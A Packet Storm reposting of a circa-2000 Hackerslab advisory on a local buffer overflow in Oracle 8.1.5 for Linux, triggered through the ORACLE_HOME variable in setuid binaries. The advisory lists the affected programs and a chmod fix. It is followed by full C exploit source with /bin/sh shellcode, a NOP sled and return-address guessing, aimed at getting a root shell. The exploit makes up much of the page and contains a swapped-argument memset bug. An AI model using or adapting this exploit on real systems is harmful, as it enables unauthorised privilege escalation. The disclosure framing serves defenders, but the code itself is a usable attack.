Oracle 8.1.5 local buffer overflow exploit for Linux.
d529954e32f7d3ccdfd831d3eacc8c0b================================================================================
[ Hackerslab bug_paper ] Linux ORACLE 8.1.5 vulnerability
================================================================================
File : Oracle 8.1.5
SYSTEM : LINUX
Tested by RedHat Linux 6.2
INFO :
There are two security vulnerability in Oracle.
1. buffer overflow
It is possible to create a buffer overflow vulnerability using "ORACLE_HOME",
one of the environmental value of Oracle.
Oracle applications that are vulnerable to buffer overflow are as follow :
- names
- namesctl
- onrsd
- osslogin
- tnslsnr
- tnsping
- trcasst
- trcroute
Thease applications allow an attacker to excute a buffer overflow exploit.
2. Log-files created
When a user excutes one of Oracle applications such as names, oracle or tnslsnr,
following log files are created.
names
======
-rw-rw-r-- 1 oracle dba 0 Oct 20 01:45 ckpcch.ora
-rw-rw-r-- 1 oracle dba 428 Oct 20 01:45 ckpreg.ora
-rw-rw-r-- 1 oracle dba 950 Oct 20 01:45 names.log
oracle
======
-rw-rw---- 1 oracle dba 616 Oct 20 05:14 ora_[running pid].trc
tnslsnr
=======
-rw-rw-r-- 1 oracle dba 2182176 Oct 20 2000 listener.log
SOLUTION
Contact your vendor for a patch or close setuid permission.
# su - oracle
$ cd /oracle_8.1.5_install_directory/bin
$ chmod a-s names namesctl onrsd osslogin tnslsnr tnsping trcasst trcroute
==-------------------------------------------------------------------------------==
********
* ** ** *
* ** ** *
* ****** *
* ** ** * loveyou@hackerslab.org [yong-jun, kim]
* ** ** * [ http://www.hackerslab.org ]
******** HACKERSLAB (C) since 1999
==-------------------------------------------------------------------------------==
/*
Oracle 8.1.5 exploit
-by loveyou
offset value : -500 ~ +500
*/
#include <stdio.h>
#include <stdlib.h>
#define BUFFER 800
#define NOP 0x90
#define PATH "/hackerslab/loveyou/oracle/8.1.5/bin/names"
char shellcode[] =
/* - K2 - */
/* main: */
"\xeb\x1d" /* jmp callz */
/* start: */
"\x5e" /* popl %esi */
"\x29\xc0" /* subl %eax, %eax */
"\x88\x46\x07" /* movb %al, 0x07(%esi) */
"\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
"\x89\x76\x08" /* movl %esi, 0x08(%esi) */
"\xb0\x0b" /* movb $0x0b, %al */
"\x87\xf3" /* xchgl %esi, %ebx */
"\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */
"\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */
"\xcd\x80" /* int $0x80 */
"\x29\xc0" /* subl %eax, %eax */
"\x40" /* incl %eax */
"\xcd\x80" /* int $0x80 */
/* callz: */
"\xe8\xde\xff\xff\xff" /* call start */
"/bin/sh";
unsigned long getesp(void)
{
__asm__("movl %esp,%eax");
}
int main(int argc, char *argv[])
{
char *buff, *ptr,binary[120];
long *addr_ptr, addr;
int bsize=BUFFER;
int i,offset;
offset = 0 ;
if ( argc > 1 ) offset = atoi(argv[1]);
buff = malloc(bsize);
addr = getesp() - 5933 - offset;
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
memset(buff,bsize/2,NOP);
ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
setenv("ORACLE_HOME",buff,1);
printf("[ offset:%d buffer=%d ret:0x%x ]\n",
offset,strlen(buff),addr);
system(PATH);
}
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!